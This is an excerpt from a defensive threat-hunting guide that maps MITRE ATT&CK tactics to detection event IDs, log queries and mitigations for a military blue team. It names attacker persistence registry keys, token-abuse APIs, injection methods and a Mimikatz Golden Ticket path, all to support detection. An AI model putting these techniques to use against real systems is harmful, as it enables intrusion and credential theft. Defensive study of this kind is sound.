MITTRE ATT&CK Framework
Excerpt from "Hunt Methodology" By Christian B.
Last updated
Excerpt from "Hunt Methodology" By Christian B.
Last updated
Now that we have done all of the necessary preparation, it is time to start hunting on the network. The MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) Framework can be used to give analysts a good idea of where to start. The MITRE ATT&CK Framework was developed by MITRE as a model to document and track various techniques attackers use throughout the different stages of a cyber-attack to infiltrate network and exfiltrate data. The SOC lead can use the tactics identified in the MITRE ATT&CK Framework to assist in identifying and classifying potentially anomalous traffic.
Each of these tactics could take an entire book to properly cover, so in this document, we will try to focus on the typical avenues of approach. A link to the MITRE page will be provided for each tactic in the event that more information is needed.
Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or maybe limited use due to changing passwords. Since typical tactical networks in the military do not include web servers, it is more likely that some form of phishing will be used to gain initial access to the network.
Common signs of a possible phishing attempt include Non-DoD Source emails, unsigned emails, misspelt or atypical domain names, poorly written emails, suspicious links or attachments, etc. All of these things can be seen in your sensor logs provided those emails are unencrypted. If the emails are encrypted, you won’t see anything unless the user falls for the phishing attempt.
URL inspection within an email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once User Execution occurs.
Prevention of phishing attempts really falls on the education of the users. It is recommended that the blue team sets up a way for phishing attempts to be reported. This can be easily accomplished by setting up a shared mailbox in Outlook to include the members of the team. It may also help to configure the email client to show URL links in black so they have to be copied and pasted versus clicked on. Once reported, or in the event a user falls for the attempt, some easy ways to prevent future phishing attempts from the same source are to block the domain name where the email is coming from and run nslookup on the domain name to determine the Internet Protocol (IP) and block that IP as well. Blocking can be done on the firewall, configuring DNS redirectors to a null IP, Access Control Lists (ACL) on networking devices, or on Host Intrusion Prevention System (HIPS) Firewall in ePolicy Orchestrator (ePO). It is important to block both the IP and the domain name to prevent the adversary from simply changing one or the other. Restricting web-based content or web content filtering can also be an efficient way to mitigate the risk of phishing attempts.
More Information
For more information regarding Initial Access, refer to:
Execution covers a very broad spectrum of things that could potentially happen. Things to generally look for are Powershell scripts being run or unauthorized software being executed on the network. Understand that if you are falling into an already built network that you have not seen before, it may be easier to just monitor for execution and remediate findings as you see them rather than risk breaking functionality by implementing preventative methods mid-exercise.
Prevention and remediation of the execution of malicious code are difficult and sometimes not entirely doable on Marine Corps networks. One way to prevent execution could be to implement application whitelisting and limit authorized software to Microsoft-signed executables and software necessary for system functionality. This method can be done using Group Policy Objects (GPO) or on the ePO server but runs the risk of breaking something that system functionality may be dependent on and it is highly recommended that it be implemented well ahead of exercise execution in order to test appropriately. Another method of prevention would be to implement a policy for Powershell scripts to only be run if signed. This method would require setup in advance of exercise or operations execution. Remedial actions could be simply blacklisting unauthorized executables or restricting remote code execution to a single workstation on the network to prevent adversaries from executing code remotely on any workstation on the network.
More Information
For more information regarding Execution, refer to:
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.
Persistence can be implemented in a variety of ways. Some of the more popular methods of initiating persistence include modifying or spoofing services, scheduled tasks, or altering run keys in the registry.
When using services to achieve persistence, adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. It is also possible for an adversary to incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Some easy ways to detect this method are to look at Windows Event logs using your sensor dashboards. Windows Event ID 4697 indicates a service is installed on a system and Event ID 1 is triggered when a process is created.
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account login. These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. Windows operating systems provide a utility (schtasks.exe) that enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism. Administrator privileges are not required to perform persistence via scheduled tasks however further actions are allowed such as executing a task during logon of a user or during an idle state if elevated privileges have been achieved.
You can monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. There are also several Windows Event IDs that can be used to check scheduled tasks:
Registry keys can be added from the terminal to the run keys to achieve persistence. These keys will contain a reference to the actual payload that will be executed when a user logs in. The following registry locations are known to be used by threat actors:
Windows Event ID keys related to this method of persistence include Event ID 12 (Object created or deleted), Event ID 13 (Registry value set), and Event ID 14 (Registry key and value renamed).
Windows Management Instrumentation (WMI) is a set of specifications from Microsoft for consolidating the management of devices and applications in a network from Windows computing systems. WMI provides users with information about the status of local or remote computer systems.
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user logging, or the computer's uptime. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
This can be detected by monitoring WMI event subscription entries and comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempted at persistence.
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent PowerShell cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).
Without proper account management, limited credential overlaps across systems, or application whitelisting, Persistence is another tactic that might be easier to mitigate as you find it rather than risk breaking something by applying preventative measures mid-exercise. Ensure that unauthorized applications are not being run to auto-start or run upon login. If this is happening, those applications can be blocked via GPO or in the ePO Server.
For more information regarding Persistence, refer to:
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:
-SYSTEM/root level
-Local administrator
-User account with admin-like access
-User accounts with access to a specific system or perform a specific function.
These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.
There are several methods of achieving privilege escalation. Some of the more common methods are Token Manipulation, Autostart Executions, Process Injections, and Scheduled Tasks.
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
The following Application Programming Interface (API) calls can be used to steal and abuse access tokens:
-OpenProcess() - takes a process identifier (PID) and returns a process handle. The process handle must be opened with the PROCESS_QUERY_INFORMATION, PROCESS_QUERY_LIMITED_INFORMATION or the PROCESS_ALL_ACCESS access right to be useable with OpenProcessToken()
-OpenProcessToken() - takes a process handle and an access rights flag as input. It will open a handle to the access token associated with a process. The token handle must be opened with the TOKEN_QUERY and TOKEN_DUPLICATE access rights to be useable with ImpersonateLoggedOnUser()
-ImpersonateLoggedOnUser() - allows our current thread to impersonate another logged-on user.
-DuplicateTokenEx() - spawn a process as another user
-CreateProcessWithTokenW()
-SetThreadToken
-ImpersonateLoggedOnUser
Windows Event IDs that can be viewed to identify modified tokens include ID 4672 (special privileges assigned to new logon), 4703 (a token right was adjusted), 4673 (a privileged service was called), 4674 (an operation was attempted on a privileged object).
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account login. These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
Adversaries may abuse features of Winlogon to execute Dynamic-Link Libraries (DLL) and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in the context of the Local Service account.
Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine.
Process Injection is a method of executing arbitrary code in the address space of another live process in order to gain privilege escalation and evade process-based defenses. The links below are different ways to inject code into a process, many of which abuse legitimate functionalities. Injections exist for every major OS but are typically platform specific.
There are several ways privilege escalation can be achieved using process injection. Those methods include but are not limited to:
-DLL Injection
-Portable Executable Injection
-Thread Execution Hijacking
-Asynchronous Procedure Call
-Thread Local Storage
-PTrace System Calls
-Proc Memory
-Extra Window Memory Injection
-Process Hollowing
-Process Doppelganging
-Virtual Dynamic Shared Object (vDSO) Hijacking
Task Scheduler is a set of Microsoft Windows components that allows for the execution of scheduled tasks. The front-end components of Task Scheduler, such as schtasks.exe, are interfaces that allow users to view, create, and modify scheduled tasks. The back-end part of Task Scheduler is a Windows service that runs with SYSTEM privileges. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
Privilege escalation through scheduled tasks can be detected by monitoring process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. One can also monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Once access is gained to an account with elevated privileges, an attacker can log into the Domain Controller (DC) and use a tool like Mimikatz to dump the password hash for the KRBTGT account and create a Golden Ticket. The Kerberos token can then be loaded into any session for any user and access anything on the network using Mimikatz.
There are several ways to escalate privileges and several ways to prevent it as well. The easiest way to do this is to make passwords secure so that accounts can’t be brute-forced. It is difficult to actually prevent users from using keyboard walks and simple passwords, so when possible it is always recommended to use two-factor authentication. Configure specialized users and groups with minimum privileges and remove user accounts when they are no longer needed. Close unused ports and limit file access only to users and groups with need-to-know. Change default credentials on all devices. This can be done by implementing Local Admin Password Solution (LAPS).
In the event that an adversary acquires the Golden Ticket, you will need to reset all domain and local passwords. You will need to change the KRBTGT account password twice, restarting the DC after each reset.
For more information regarding Privilege Escalation, refer to:
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
Detecting defensive evasion is actually pretty straightforward provided you have sensors in place and are receiving host logs. You will find Powershell scripts being used across the network that are obfuscated and logs will be created when software is being uninstalled. It is important to know what Powershell scripts are being used by your LNOs and also by your own team. This will make it easier to detect potentially malicious scripts on the network.
For more information on Defensive Evasion, refer to:
Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.
Detection and prevention methods for credential access are very similar to those covered in the Privilege Escalation section.
Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.
When detecting discovery tactics, you will often see AD user and Organizational Unit (OU) dumps, query commands on hosts, files or directories, network scans or sniffs, etc. Discovery tactics often look very similar in logs to what your team will be doing during the reconnaissance phase. This makes it very important to know what your source IPs are when running your own scans because analysts will often confuse our own reconnaissance tools as the adversary if they are unaware of their own IP spaces.
Preventing attackers from being able to use discovery tactics is not always very easy. Simple query commands that can be run by anyone are often used during this phase of an attack. Ensure that file shares are locked down and that any network diagrams are password protected. In the event that an adversary has gained access and you are seeing them conduct discovery tactics, sometimes it is best to observe them and see what files they are trying to access. We will talk more about methodology regarding removing adversaries from the network later but know now that it is better to gather all of the evidence and eliminate the enemy completely rather than play wack-a-mole.
For more information regarding Discovery tactics, refer to:
Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.
There are several ways to accomplish lateral movement. Some of the most common methods are PsExec, Windows Remote Management (WinRM), and WMI.
PsExec comes from Microsoft’s Sysinternals suite and allows users to execute PowerShell on remote hosts over port 445 or Server Message Block (SMB) using named pipes. The adversary first connects to the ADMIN$ share on the target over SMB and uploads PSEXSVC.exe. They will then use Service Control Manager to start the PsExec executable which creates a named pipe on the remote system.
This can be detected by monitoring for remote service creation using the well-known “PSEXESVC” name:
EventCode==7045 AND (“Service Name” CONTAINS “PSEXESVC”)
If telemetry is available, the optimal solution is to monitor for the uniquely-named pipes that are created as part of the process:
EventCode==5145 AND (“Relative Target Name” CONTAINS (“*-stdin” OR “*-stdout” OR “*-stderr”))
Finally, changes to the EULA registry key could be a useful addition to any of the above:
EventCode==13 AND (“TargetObject” CONTAINS “*software\sysinternals\psexec\eulaaccepted”)
Proper whitelisting and baselining are critical to identifying anomalous and potentially malicious activity. Sysinternals PsExec is a legitimate systems administration utility and may be used as such day-to-day in an environment. Some legitimate monitoring solutions, vulnerability scanners, or asset management systems might also exhibit this activity pattern. Knowing your allow lists and baseline profile can help differentiate between common benign activity and potentially malicious behavior.
Additional Windows Event IDs that could assist in detecting lateral movement over PsExec include Event ID 4697 (a service was installed on the system), 4624 (successful logon), and 7045 (source service control manager).
WinRM (Windows Remote Management) is Microsoft's implementation of WS-Management in Windows which allows systems to access or exchange management information across a common network. Unlike traditional web traffic, it doesn’t use 80/443 but instead uses 5985 (HTTP) and 5986 (HTTPS). Windows Remote Management allows for commands to be sent to remote Windows computers over HTTP or HTTPS by leveraging the Web Services for Management protocol. WinRM runs as a service under the Network Service account, and as native Microsoft components, use of these tools will bypass many whitelisting solutions providing another attractive option for attackers. The use of the Windows Remote Services command, winrs, allows for the execution of arbitrary commands on remote systems.
Windows Management Instrumentation (WMI) is built into Windows to allow remote access to Windows components, via the WMI service. Communicating by using Remote Procedure Calls (RPCs) over port 135 for remote access (and an ephemeral port later), allows system admins to perform automated administrative tasks remotely, e.g. starting a service or executing a command remotely. It can interact directly via wmic.exe.
Some Sysmon IDs that can be used to assist in the detection of WMI lateral movement include Sysmon ID 19 (WMIEventFilter activity detected), ID 20 (WMIEventConsumer activity detected), and ID 21 (WMIEventConsumerToFilter activity detected).
Ensure that administrators on the network are using their regular user accounts whenever possible. Utilize the principle of least privilege. Two-factor authentication should be used whenever possible. Prevent attackers from using tools to assist in lateral movement by implementing application whitelisting. Segmenting the network is always one of the strongest recommendations to prevent Lateral Movement, but understand that Marine Corps networks will almost always be a flat domain.
Additional methods of mitigating lateral movement techniques include:
- Implementing a simple three-tiered administration model (Workstations, General Servers, Authentication Servers)
-Denying logon for security principals in the wrong tier
-Denying all SMB communication between workstations
-Denying most SMB communication from workstations to servers
-Prioritizing Operating System upgrades for ‘high-risk’ servers
-Deploying Windows Defender Code Integrity rules
-Deploying Windows Defender Attack Surface Reduction rules
-Denying network logon for security principals likely to be used for adversary lateral movement*
-Denying ‘log on as a service for administrative accounts
-Windows Token filtering policies
-Improved Service Control Manager ACLs
-WMI access restrictions
-Advanced Windows Firewall configurations for all SMB traffic — IPSEC (null encryption)**
-Network-based tiering restrictions on a per-service level
-Windows Firewall built in Named Pipe rules
For more information regarding Lateral Movement, refer to:
Collection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.
Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
An adversary may exfiltrate data in fixed-size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts but you may also see a spike in data on your sensors.
Another indicator could be if you see a user pulling data from a file share that they may have no role or reason for accessing.
The best way to mitigate collection or exfiltration of files is by ensuring that your files are locked down and utilizing the lowest privilege necessary policies.
For more information on Collection and Exfiltration
Command and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.
Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Adversaries may obfuscate command and control traffic to make it more difficult to detect. C2 communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Consider filtering DNS requests to unknown, untrusted, or known bad domains and resources. Resolving DNS requests with on-premise/proxy servers may also disrupt adversary attempts to conceal data within DNS packets. If you see a host beaconing out to an unknown or potentially malicious domain, ensure that the domain and IP are blocked if possible. Consider isolating that host machine until you can determine what is causing the beacon.
For more information regarding C2, refer to:
Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries as a distraction to follow through on their end goal or to provide cover for a confidentiality breach.
This will be fairly obvious when it happens. Typically an adversary on the network wants to be as quiet as possible but this tactic will be loud and hard to miss. Understand that this tactic is typically used to impose costs on your team and distract them from another objective.
As discussed, this tactic is often used to impose costs on your team and draw them away from the real target. It is imperative that you task the LNOs appropriately in fixing the problem to allow you to focus on detecting other issues.
For more information on Impact, refer to:
Because entire books can be written about these methods, it is recommended that those interested in more detail do their research. These methods are all annotated on the DCO Wiki page located on the DCO portion of the Tactical Information Environment (TIE) network. The URL for that wiki is
